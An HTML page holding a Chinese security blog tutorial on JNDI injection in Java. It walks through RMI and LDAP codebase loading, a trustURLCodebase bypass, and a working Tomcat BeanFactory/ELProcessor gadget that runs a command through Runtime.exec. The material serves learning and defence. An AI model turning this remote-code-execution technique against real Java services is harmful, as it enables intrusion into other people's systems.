<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>HEY3E</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="HEY3E"><meta name="msapplication-TileImage" content="/img/me.png"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="HEY3E"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="JavaSec系列 - 2. JNDI注入 本章源码： https:&amp;#x2F;&amp;#x2F;github.com&amp;#x2F;hey3e&amp;#x2F;JavaSec-Code&amp;#x2F;tree&amp;#x2F;main&amp;#x2F;javasec2  命名与目录系统 (Naming and Directory services)，如RMI (Remote Method Invocation)、LDAP (Lightweight Directory Access Protoco"><meta property="og:type" content="blog"><meta property="og:title" content="HEY3E"><meta property="og:url" content="https://hey3e.github.io/2021/12/29/JavaSec%E7%B3%BB%E5%88%97-2-JNDI%E6%B3%A8%E5%85%A5/%E6%9C%AA%E5%91%BD%E5%90%8D/"><meta property="og:site_name" content="HEY3E"><meta property="og:description" content="JavaSec系列 - 2. JNDI注入 本章源码： https:&amp;#x2F;&amp;#x2F;github.com&amp;#x2F;hey3e&amp;#x2F;JavaSec-Code&amp;#x2F;tree&amp;#x2F;main&amp;#x2F;javasec2  命名与目录系统 (Naming and Directory services)，如RMI (Remote Method Invocation)、LDAP (Lightweight Directory Access Protoco"><meta property="og:locale" content="en_US"><meta property="og:image" content="https://hey3e.github.io/img/og_image.png"><meta property="article:published_time" content="2021-12-29T13:40:23.896Z"><meta property="article:modified_time" content="2021-12-29T11:40:23.000Z"><meta property="article:author" content="hey3e"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="/img/og_image.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://hey3e.github.io/2021/12/29/JavaSec%E7%B3%BB%E5%88%97-2-JNDI%E6%B3%A8%E5%85%A5/%E6%9C%AA%E5%91%BD%E5%90%8D/"},"headline":"HEY3E","image":["https://hey3e.github.io/img/og_image.png"],"datePublished":"2021-12-29T13:40:23.896Z","dateModified":"2021-12-29T11:40:23.000Z","author":{"@type":"Person","name":"hey3e"},"publisher":{"@type":"Organization","name":"HEY3E","logo":{"@type":"ImageObject","url":"https://hey3e.github.io/img/logo.svg"}},"description":"JavaSec系列 - 2. JNDI注入 本章源码： https:&#x2F;&#x2F;github.com&#x2F;hey3e&#x2F;JavaSec-Code&#x2F;tree&#x2F;main&#x2F;javasec2  命名与目录系统 (Naming and Directory services)，如RMI (Remote Method Invocation)、LDAP (Lightweight Directory Access Protoco"}</script><link rel="canonical" href="https://hey3e.github.io/2021/12/29/JavaSec%E7%B3%BB%E5%88%97-2-JNDI%E6%B3%A8%E5%85%A5/%E6%9C%AA%E5%91%BD%E5%90%8D/"><link rel="alternate" href="/atom.xml" title="HEY3E" type="application/atom+xml"><link rel="icon" href="/img/me.png"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.15.2/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Oxanium:wght@300;400;600&amp;family=Roboto+Mono"><link rel="stylesheet" href="/css/cyberpunk.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script><!--!--><!--!--><meta name="generator" content="Hexo 5.4.0"></head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.svg" alt="HEY3E" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a></div><div class="navbar-end"><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item">Posted&nbsp;<time dateTime="2021-12-29T13:40:23.896Z" title="2021-12-29 21:40:23">2021-12-29</time></span><span class="level-item">Updated&nbsp;<time dateTime="2021-12-29T11:40:23.000Z" title="2021-12-29 19:40:23">2021-12-29</time></span><span class="level-item">20 minutes read (About 2969 words)</span></div></div><div class="content"><h1 id="JavaSec系列-2-JNDI注入"><a href="#JavaSec系列-2-JNDI注入" class="headerlink" title="JavaSec系列 - 2. JNDI注入"></a>JavaSec系列 - 2. JNDI注入</h1><blockquote>
<p>本章源码： <a target="_blank" rel="noopener" href="https://github.com/hey3e/JavaSec-Code/tree/main/javasec2">https://github.com/hey3e/JavaSec-Code/tree/main/javasec2</a></p>
</blockquote>
<p>命名与目录系统 (Naming and Directory services)，如<strong>RMI</strong> (Remote Method Invocation)、<strong>LDAP</strong> (Lightweight Directory Access Protocol) 等，能够以类似字典<code>key-value</code>的<code>name-object</code>形式对对象进行存储，使得我们可以通过名称来查询并访问对象。<strong>JNDI</strong> (Java Naming and Directory Interface) 便是该过程的接口。</p>
<p>结合上一章的知识，我们考虑在系统中存储对象序列化后的字节流，当用户进行查询时，系统返回对应的字节流，用户再进行反序列化获取对象。但在实际场景中，如果对象过大，采用该方式往往会给系统带来一定的负担。</p>
<p>于是，JNDI使用<code>Naming References</code>的方式进行存储，此时，<code>name-object</code>中的<code>object</code>并非对象本身，而是对象的引用<code>Reference</code>，其中包含对象名及其真正被存放的地址codebase。当用户进行查询时，系统返回<code>Reference</code>，用户解析后再从codebase获取对象。<strong>不过这里说的不太严谨，后面会进行补充</strong>。</p>
<p>不过，上述从远程codebase加载对象的方式存在许多安全问题，随着jdk版本的迭代，系统对codebase已逐渐不再信任，JNDI受到越来越多的限制。我们下面看一下各版本下JNDI如何实现。</p>
<h3 id="（1）jdk-lt-8u121-RMI-JNDI"><a href="#（1）jdk-lt-8u121-RMI-JNDI" class="headerlink" title="（1）jdk&lt;8u121 (RMI+JNDI)"></a>（1）jdk&lt;8u121 (RMI+JNDI)</h3><p>首先，构造要查询的目标类<code>TargetClass</code>：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">TargetClass</span> </span>&#123;</span><br><span class="line">    <span class="keyword">static</span> &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;[+] Server Static Constructor Method.&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="title">TargetClass</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;[+] Server Constructor Method.&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>javac编译，并挂到python的简易服务器上：</p>
<p>![image-20211227162859721](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211227162859721.png)</p>
<p>下面编写RMI服务器的代码：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">RMIServer</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">      	<span class="comment">//a</span></span><br><span class="line">        Registry registry = LocateRegistry.createRegistry(<span class="number">1099</span>); </span><br><span class="line">				</span><br><span class="line">      	<span class="comment">//b</span></span><br><span class="line">        String FactoryURL = <span class="string">&quot;http://127.0.0.1:4444/&quot;</span>;</span><br><span class="line">        Reference reference = <span class="keyword">new</span> Reference(<span class="string">&quot;ReferenceClass&quot;</span>,<span class="string">&quot;TargetClass&quot;</span>, FactoryURL);</span><br><span class="line">        ReferenceWrapper wrapper = <span class="keyword">new</span> ReferenceWrapper(reference);</span><br><span class="line">      	</span><br><span class="line">      	<span class="comment">//c</span></span><br><span class="line">        registry.bind(<span class="string">&quot;Target&quot;</span>, wrapper);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>其中：</p>
<ul>
<li>a处，创建RMI服务，监听1099端口。</li>
<li>b处，构造<code>Reference</code>，codebase为前文的python服务器，对象为<code>TargetClass</code>类。</li>
<li>c处，进行存储，<code>name</code>为Target，<code>object</code>为<code>Reference</code>。</li>
</ul>
<p>接下来，编写Client查询代码：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">RMIClient</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        Context ctx = <span class="keyword">new</span> InitialContext();</span><br><span class="line">        ctx.lookup(<span class="string">&quot;rmi://127.0.0.1:1099/Target&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>注意，Client与<code>TargetClass</code>需要在不同的project中，后面会同本文开头的“不严谨”一起给出解释。</strong>这里我们使用<code>InitialContext</code>类的<code>lookup</code>方法向RMI系统进行查询。</p>
<p>运行Server后运行Client，发现<code>TargetClass</code>类的两段代码都被执行，同时服务器收到了一条GET请求：</p>
<p>![image-20211227170839084](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211227170839084.png)</p>
<p>![image-20211227170903087](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211227170903087.png)</p>
<p>开始跟进<code>lookup</code>。<code>InitialContext</code>类的<code>lookup</code>方法首先调用了<code>getURLOrDefaultInitCtx</code>获取到基于URL scheme的<code>Context</code>，此处是基于rmi的<code>RegistryContext</code>：</p>
<p>![image-20211227173539819](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211227173539819.png)</p>
<p>继续调用两个<code>lookup</code>后，来到<code>RegistryContext</code>类的<code>decodeObject</code>方法，此时Client已经获取到了目标对象的<code>Reference</code>：</p>
<p>![image-20211227174301523](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211227174301523.png)</p>
<p>接着，在<code>NamingManager</code>类的<code>getObjectInstance</code>方法中，对<code>Reference</code>进行了处理，传入<code>getObjectFactoryFromReference</code>方法：</p>
<p>![image-20211227174435566](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211227174435566.png)</p>
<p>此处处理后的<code>Reference</code>如下，与RMI系统中设置的一致：</p>
<p>![image-20211227174652910](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211227174652910.png)</p>
<p>其中，<code>className</code>为自定的类名，<code>classFactory</code>为目标类名，<code>classFactoryLocation</code>为codebase。</p>
<p>在<code>getObjectFactoryFromReference</code>方法中，程序分别尝试了从本地和codebase两处加载<code>TargetClass</code>：</p>
<p>![image-20211227180332310](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211227180332310.png)</p>
<p>最终，程序选择了codebase的<code>loadClass</code>，并在其中调用了我们熟悉的<code>forName</code>：</p>
<p>![image-20211227181028121](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211227181028121.png)</p>
<p>不仅如此，<code>getObjectFactoryFromReference</code>还调用了<code>newInstance</code>方法完成了对<code>TargetClass</code>的初始化，至此，RMI上的JNDI完成：</p>
<p>![image-20211227181123074](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211227181123074.png)</p>
<p>在jdk&gt;8u121的环境下使用上述RMI+JNDI时，我们发现Client报错：</p>
<p>![image-20211228103223828](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211228103223828.png)</p>
<p>可见高版本RMI默认已不信任codebase。为绕过该限制，我们可以转向LDAP+JNDI。</p>
<h3 id="（2）jdk-lt-8u191-LDAP-JNDI"><a href="#（2）jdk-lt-8u191-LDAP-JNDI" class="headerlink" title="（2）jdk&lt;8u191 (LDAP+JNDI)"></a>（2）jdk&lt;8u191 (LDAP+JNDI)</h3><p>这里，我们方便的用<a target="_blank" rel="noopener" href="https://github.com/mbechler/marshalsec">marshalsec</a>启动一个LDAP服务器：</p>
<p>![image-20211228104234012](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211228104234012.png)</p>
<p>修改Client代码中的URL scheme为ldap，端口为1389:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">RMIClient</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        Context ctx = <span class="keyword">new</span> InitialContext();</span><br><span class="line">        ctx.lookup(<span class="string">&quot;ldap://127.0.0.1:1389/Target&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>运行，成功加载并初始化<code>TargetClass</code>，LDAP上的JNDI完成：</p>
<p>![image-20211228104531982](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211228104531982.png)</p>
<p>跟进<code>lookup</code>方法，流程与RMI类似。</p>
<h3 id="（3）JNDI注入"><a href="#（3）JNDI注入" class="headerlink" title="（3）JNDI注入"></a>（3）JNDI注入</h3><p>同样，marshalsec也可以启动RMI服务器：</p>
<p>![image-20211228110332920](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211228110332920.png)</p>
<p>其中，JRMP (Java Remote Method Protocol) 远程方法协议，是用于RMI过程中的协议。</p>
<p>运行Client，可以得到与前文同样的结果。</p>
<p>marshalsec与我们自己编写的RMI服务器之间的不同之处在于，如果你向我们编写的RMI服务器查询一个不存在的对象Foo：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctx.lookup(<span class="string">&quot;rmi://127.0.0.1:1097/Foo&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>程序会报<code>NameNotFound</code>错误：</p>
<p>![image-20211228111305582](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211228111305582.png)</p>
<p>这是因为我们的RMI服务器上并未存储名为Foo的<code>Reference</code>。</p>
<p>若向marshalsec的RMI服务器查询，成功：</p>
<p>![image-20211228111523080](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211228111523080.png)</p>
<p>这是因为marshalsec实际上是利用socket自定义了一个RMI服务器，当收到rmi的lookup请求时，服务器会调用<code>handleRMI</code>方法进行处理：</p>
<p>![image-20211228113224794](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211228113224794.png)</p>
<p>其中，我们提供的参数 “<a target="_blank" rel="noopener" href="http://127.0.0.1:4444/#TargetClass&quot;%E4%BC%9A%E8%A2%AB%E7%9B%B4%E6%8E%A5%E5%8C%85%E8%A3%85%E6%88%90%60Reference%60%E8%BF%94%E5%9B%9E%E3%80%82%E5%8D%B3%E6%97%A0%E8%AE%BAClient%E6%9F%A5%E8%AF%A2%E8%B0%81%EF%BC%8C%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%BF%94%E5%9B%9E%E7%9A%84%E9%83%BD%E6%98%AF%E6%88%91%E4%BB%AC%E8%AE%BE%E8%AE%A1%E7%9A%84%60Reference%60%E3%80%82%E5%9B%A0%E6%AD%A4JNDI%E4%B8%80%E5%AE%9A%E6%88%90%E5%8A%9F%E3%80%82">http://127.0.0.1:4444/#TargetClass&quot;会被直接包装成`Reference`返回。即无论Client查询谁，服务器返回的都是我们设计的`Reference`。因此JNDI一定成功。</a></p>
<p>marshalsec的LDAP服务器同理，当收到ldap的lookup请求时，调用<code>sendResult</code>方法，返回我们设计的<code>Reference</code>：</p>
<p>![image-20211228115225671](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211228115225671.png)</p>
<p>上面所讲均是JNDI的使用。试想如果我们能够控制目标<code>lookup</code>方法的参数，使其向由我们启动的服务器发起查询，以返回一个指定的恶意<code>Reference</code>，就可以达到远程代码执行的效果。这类攻击就叫做<strong>JNDI注入</strong>。</p>
<p>下面是来自<a target="_blank" rel="noopener" href="https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf%E7%9A%84%E4%B8%A4%E7%B1%BBJNDI%E6%B3%A8%E5%85%A5%E7%A4%BA%E6%84%8F%E5%9B%BE%EF%BC%9A">https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf的两类JNDI注入示意图：</a></p>
<p>![image-20211228144313615](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211228144313615.png)</p>
<p>![image-20211228144336058](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211228144336058.png)</p>
<h3 id="（4）jdk-gt-8u191"><a href="#（4）jdk-gt-8u191" class="headerlink" title="（4）jdk&gt;8u191"></a>（4）jdk&gt;8u191</h3><p>在jdk8u191+的环境中，LDAP默认也已不再信任codebase。至此，已难以通过远程加载codebase的方式实现JNDI注入。</p>
<p>下面我们先来<strong>填一下前文“不严谨”和“不同project”的坑</strong>。</p>
<p>我们切回到jdk&lt;8u121的环境下，并在Client的目录下也构造一个<code>TargetClass</code>，使其实现<code>ObjectFactory</code>接口和<code>getObjectInstance</code>方法：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> javax.naming.Context;</span><br><span class="line"><span class="keyword">import</span> javax.naming.Name;</span><br><span class="line"><span class="keyword">import</span> javax.naming.spi.ObjectFactory;</span><br><span class="line"><span class="keyword">import</span> java.util.Hashtable;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">TargetClass</span> <span class="keyword">implements</span> <span class="title">ObjectFactory</span> </span>&#123;</span><br><span class="line">    <span class="keyword">static</span> &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;[+] Client&#x27;s Static Constructor Method.&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="title">TargetClass</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;[+] Client&#x27;s Constructor Method.&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="function"><span class="keyword">public</span> Object <span class="title">getObjectInstance</span><span class="params">(Object obj, Name name, Context nameCtx, Hashtable&lt;?, ?&gt; environment)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>还有一点不同，这里我们打印的是”Client…”，而codebase下的<code>TargetClass</code>打印的是”Server…”。</p>
<p>复现RMI+JNDI，查看结果：</p>
<p>![image-20211228151354591](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211228151354591.png)</p>
<p>可知Client这次拿到的是本地的<code>TargetClass</code>。跟进，再次来到<code>getObjectFactoryFromReference</code>方法，发现这次程序选择了从本地进行加载：</p>
<p>![image-20211228151752764](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211228151752764.png)</p>
<p>于是，我们可以补充一下文章开头的JNDI知识点：当用户进行查询时，系统返回<code>Reference</code>，用户会先在本地ClassPath中查找该对象，若没有，再去codebase处获取。</p>
<p>综上，我们考虑：既然高版本jdk限制了从codebase获取类，我们就尝试通过利用本地ClassPath中已有的类来实现JNDI注入。</p>
<p>首先，这个类需要实现了<code>ObjectFactory</code>接口和<code>getObjectInstance</code>方法，在Apache Tomcat中，我们找到了符合条件的<code>org.apache.naming.factory.BeanFactory</code>类：</p>
<p>![image-20211229110051478](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211229110051478.png)</p>
<p>回头debug本地类的JNDI，我们看到该类实现的<code>getObjectInstance</code>方法会被调用：</p>
<p>![image-20211229110356997](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211229110356997.png)</p>
<p>于是我们下面来看<code>org.apache.naming.factory.BeanFactory</code>类的<code>getObjectInstance</code>方法有什么值得利用的地方。</p>
<p>![image-20211229112334149](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211229112334149.png)</p>
<p>可见，它会处理<code>ResourceRef</code>类的<code>Reference</code>，加载并初始化名为<code>Reference</code>中<code>className</code>字段的类。由此我们得知，<code>className</code>指定的类必须本地存在且有无参构造方法。</p>
<p>继续向下：</p>
<p>![image-20211229113131680](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211229113131680.png)</p>
<p>这一段，我们了解到方法获取<code>Reference</code>中”forceString”属性的值并用’=’进行分隔，等号左边成为哈希表<code>forced</code>的一个key，其value是<code>className</code>指定的类中名为等号右边的方法。如”forceString”为”x=y”，则”x”将存为key，value为<code>y</code>方法。注意，此方法的参数<code>paramTypes</code>为一个<code>String</code>类型，所以我们要找的<code>className</code>指定的类中需要有这样一个方法。</p>
<p>继续向下：</p>
<p>![image-20211229114644237](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211229114644237.png)</p>
<p>这里，方法遍历<code>Reference</code>的所有属性，对type不为<code>if</code>中指定的值的属性，获取其content，并利用反射<code>invoke</code>了<code>className</code>类中名为type在<code>forced</code>中对应的value的方法，且参数为content。沿续上文的举例，若在<code>Reference</code>中添加type为”x”的属性，则<code>y</code>方法最终将被反射调用。</p>
<p>综上所述，可见如果我们能找到一个符合要求的<code>className</code>类并精心构造一个<code>Reference</code>，通过Client从本地加载<code>org.apache.naming.factory.BeanFactory</code>类并执行<code>getObjectInstance</code>方法，有希望借助反射实现JNDI注入。</p>
<p>最终，我们找到了<code>javax.el.ELProcessor</code>类，它满足我们之前提出的要求：</p>
<ul>
<li>存在于Tomcat依赖包中。</li>
<li>有无参构造方法。</li>
<li>有<code>eval</code>方法，其参数为一个String类型。</li>
</ul>
<p>同时，在设计<code>Reference</code>时，我们需要注意，在jdk8u121+的环境中，是这样检查的codebase的信任问题的：</p>
<p>![image-20211229154421743](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211229154421743.png)</p>
<p>在<code>RegistryContext</code>类的<code>decodeObject</code>方法中，对<code>trustURLCodebase</code>的<code>true</code>or<code>false</code>进行了检查。观察判断条件，我们可以通过设置<code>Reference</code>的<code>factoryLocation</code>，也就是codebase，为<code>null</code>的方式进行绕过，从而成功进入<code>getObjectInstance</code>方法。</p>
<p>接下来，根据已上思路，我们编写RMI服务器来返回恶意<code>Reference</code>：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">RMIServer191</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        Registry registry = LocateRegistry.createRegistry(<span class="number">1097</span>);</span><br><span class="line"></span><br><span class="line">        ResourceRef ref = <span class="keyword">new</span> ResourceRef(<span class="string">&quot;javax.el.ELProcessor&quot;</span>, <span class="keyword">null</span>,</span><br><span class="line">                <span class="string">&quot;&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="keyword">true</span>,<span class="string">&quot;org.apache.naming.factory.BeanFactory&quot;</span>,<span class="keyword">null</span>);</span><br><span class="line">        ref.add(<span class="keyword">new</span> StringRefAddr(<span class="string">&quot;forceString&quot;</span>, <span class="string">&quot;x=eval&quot;</span>));</span><br><span class="line">        ref.add(<span class="keyword">new</span> StringRefAddr(<span class="string">&quot;x&quot;</span>, <span class="string">&quot;\&quot;\&quot;.getClass().forName(\&quot;javax.script.ScriptEngineManager\&quot;).&quot;</span> +</span><br><span class="line">                <span class="string">&quot;newInstance().getEngineByName(\&quot;JavaScript\&quot;).&quot;</span> +           <span class="string">&quot;eval(\&quot;java.lang.Runtime.getRuntime().exec(&#x27;/System/Applications/Calculator.app/Contents/MacOS/Calculator&#x27;)\&quot;)&quot;</span>));</span><br><span class="line">        ReferenceWrapper referenceWrapper = <span class="keyword">new</span> com.sun.jndi.rmi.registry.ReferenceWrapper(ref);</span><br><span class="line">        registry.bind(<span class="string">&quot;Object&quot;</span>, referenceWrapper);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>其中，”x”属性的content，作为参数传入<code>eval</code>方法后，会被解析成EL表达式从而达到命令执行的效果。</p>
<p>运行Client，弹出计算器，JNDI注入成功：</p>
<p>![image-20211229155530328](/Users/yujiamin/Library/Application Support/typora-user-images/image-20211229155530328.png)</p>
<p>跟进<code>lookup</code>，可以对<code>org.apache.naming.factory.BeanFactory</code>类的<code>getObjectInstance</code>方法是如何处理<code>Reference</code>的有一个更深的理解。</p>
<p>至此，我们了解了不同环境下JNDI注入的绕过与实现：</p>
<ul>
<li>jdk&lt;8u121：RMI+codebase。</li>
<li>jdk&lt;8u191：LDAP+codebase。</li>
<li>jdk&gt;8u191：<code>BeanFactory</code>+本地ClassPath。</li>
</ul>
</div><div class="article-licensing box"><div class="licensing-title"><p><a href="https://hey3e.github.io/2021/12/29/JavaSec系列-2-JNDI注入/未命名/">https://hey3e.github.io/2021/12/29/JavaSec系列-2-JNDI注入/未命名/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>Author</h6><p>hey3e</p></div></div><div class="level-item is-narrow"><div><h6>Posted on</h6><p>2021-12-29</p></div></div><div class="level-item is-narrow"><div><h6>Updated on</h6><p>2021-12-29</p></div></div><div class="level-item is-narrow"><div><h6>Licensed under</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="sharethis-inline-share-buttons"></div><script src="https://ppoffice.github.io/hexo-theme-icarus/categories/Plugins/Share/" defer></script></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2021/12/29/JavaSec%E7%B3%BB%E5%88%97-2-JNDI%E6%B3%A8%E5%85%A5/"><span class="level-item">JavaSec系列 - 2. JNDI注入</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar" src="/img/me.png" alt="hey3e"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">hey3e</p><p class="is-size-6 is-block">a good-looking Security Learner</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>SEU</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives"><p class="title">3</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Category</p><a href="/categories"><p 